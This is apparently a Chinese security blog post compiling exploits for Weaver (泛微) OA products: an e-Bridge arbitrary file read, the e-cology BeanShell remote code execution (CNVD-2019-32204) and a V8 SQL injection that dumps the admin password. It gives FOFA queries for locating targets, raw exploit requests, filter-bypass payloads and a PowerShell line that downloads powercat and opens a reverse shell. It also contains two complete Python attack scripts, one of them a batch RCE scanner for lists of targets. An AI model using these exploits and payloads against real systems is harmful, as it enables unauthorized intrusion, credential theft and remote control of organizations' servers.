泛微OA漏洞(综合)
泛微OA漏洞(综合)
小骇客图片在F12sec看月球师傅文章看到的
感觉挺好看,就做封面了
【李淳罡:】借🗡一用(我是不会告诉你我刚从东海武帝城过来的哦😏)
目录
2. 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
1. 泛微云桥 e-Bridge 任意文件读取
1.1 漏洞描述
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息
1.3 影响版本
泛微云桥 e-Bridge 2018-2019 多个版本
1.2 FOFA
title="泛微云桥e-Bridge"
1.4 漏洞复现
1.4.1 Windows
访问路径
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/windows/win.ini&fileExt=txt
成功返回 id值,说明含有此漏洞
调用查看文件接口访问
/file/fileNoLogin/id值
1.4.2 Linux
访问路径
http://xxx.xxx.xxx.xxx/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
成功返回 id值,说明含有此漏洞
调用查看文件接口访问
http://xxx.xxx.xxx.xxx/file/fileNoLogin/id值
1.5 漏洞利用poc脚本
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.techimport base64
import requests
import random
import re
import json
import sysdef title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 泛微云桥 e-Bridge \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')# 判断操作系统 or 判断漏洞是否可利用
def POC_1(target_url):
vuln_url_1 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt"
vuln_url_2 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
vuln_url_3 = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response_1 = requests.get(url=vuln_url_1, headers=headers, verify=False, timeout=10)
response_2 = requests.get(url=vuln_url_2, headers=headers, verify=False, timeout=10)
response_3 = requests.get(url=vuln_url_3, headers=headers, verify=False, timeout=10)
if "无法验证您的身份" in response_1.text and "无法验证您的身份" in response_2.text:
print("\033[31m[x] 漏洞已修复,不存在漏洞 \033[0m")
sys.exit(0)
else:
if "No such file or directory" in response_1.text:
print("\033[32m[o] 目标为 Linux 系统\033[0m")
id = re.findall(r'"id":"(.*?)"', response_3.text)[0]
print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
return id,"linux"
elif "系统找不到指定的路径" in response_2.text:
print("\033[32m[o] 目标为 Windows 系统\033[0m")
id = re.findall(r'"id":"(.*?)"', response_1.text)[0]
print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
return id,"windows"else:
print("\033[31m[x] 无法获取目标系统\033[0m")
sys.exit(0)except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)# 验证漏洞
def POC_2(target_url, id):
file_url = target_url + "/file/fileNoLogin/{}".format(id)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
response.encoding = 'GBK'
print("\033[32m[o] 成功读取:\n\033[0m{}".format(response.text))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)# windows 文件读取
def POC_3(target_url, File):
file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/{}&fileExt=txt".format(File)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
id = re.findall(r'"id":"(.*?)"', response.text)[0]
print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
POC_2(target_url, id)
except :
print("\033[31m[x] 请求失败,无法读取文件 \033[0m)")# linux读取文件
def POC_4(target_url, File):
file_url = target_url + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://{}&fileExt=txt".format(File)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)
id = re.findall(r'"id":"(.*?)"', response.text)[0]
print("\033[32m[o] 成功获取id:{}\033[0m".format(id))
POC_2(target_url, id)
except:
print("\033[31m[x] 请求失败,无法读取文件 \033[0m)")
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
id,system = POC_1(target_url)
POC_2(target_url, id)
while True:
if system == "windows":
File = input("\033[35mFile >>> \033[0m")
if File == "exit":
sys.exit(0)
else:
POC_3(target_url, File)
if system == "linux":
File = input("\033[35mFile >>> \033[0m")
if File == "exit":
sys.exit(0)
else:
POC_4(target_url, File)
2. 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
2.1 漏洞描述
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重
2.2 FOFA
app="泛微-协同办公OA"
2.3 影响版本
E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0
2.4 漏洞复现
直接在网站根目录后加入组件访问路径
/weaver/bsh.servlet.BshServlet/
然后执行命令
exec("whoami")
poc
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxxxxxxx:8088
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencodedbsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
关于绕过
eval%00("ex"%2b"ec(\"whoami\")");
ex\u0065c("cmd /c dir");
IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd
2.5 poc脚本批量利用
#/usr/bin/python
#coding:utf-8
#Author:Ja0k
#For Weaver-Ecology-OA_RCEimport urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)import requests,sys
headers = {
'Content-Type': 'text/xml; charset=utf-8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Cache-Control': 'max-age=0',
'Content-Type': 'application/x-www-form-urlencoded',
'Upgrade-Insecure-Requests': '1',
'Content-Length': '578'
}proxies= {'http':'http://127.0.0.1:8080'}
def Poc_check(target):
Url_Payload1="/bsh.servlet.BshServlet"
Url_Payload2="/weaver/bsh.servlet.BshServlet"
Url_Payload3="/weaveroa/bsh.servlet.BshServlet"
Url_Payload4="/oa/bsh.servlet.BshServlet"Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw"""
Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4):
url= target + Url_Payload
for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3):
try:
http_response = requests.post(url,data=Data_payload,headers=headers,verify=False)
#print http_response.status_code
if http_response.status_code == 200:
if ";</script>" not in (http_response.content):
if "Login.jsp" not in (http_response.content):
if "Error" not in (http_response.content):
print("{0} is a E-cologyOA_RCE Vulnerability".format(url))
print("Server Current Username:{0}".format(http_response.content))
elif http_response.status_code == 500:
print("{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ".format(url))
else:
pass
except Exception,Error:
passif __name__ == '__main__':
for line in open(sys.argv[1]).readlines():
target=line.strip()
Poc_check(target)
3. 泛微OA V8 SQL注入漏洞
3.1 漏洞描述
泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限
3.2 FOFA
app="泛微-协同办公OA"
3.3 影响版本
泛微OA V8
3.4 漏洞复现
在getdata.jsp中,直接将request对象交给此方法处理
weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext)
在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法
Proc方法4个参数,(“空字符串”,”cmd参数值”,request对象,serverContext对象)
在proc方法中,对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds(sql,type)方法中
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=select password as id from userinfo;
即可完成对数据库操控
POC
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)
解密后即可登录系统
3.5 漏洞利用脚本
后续整理
内容整理自佩奇师傅:
https://github.com/PeiQi0/PeiQi-WIKI-POC/tree/PeiQi/PeiQi_Wiki/OA产品漏洞/泛微OA
更多推荐
所有评论(0)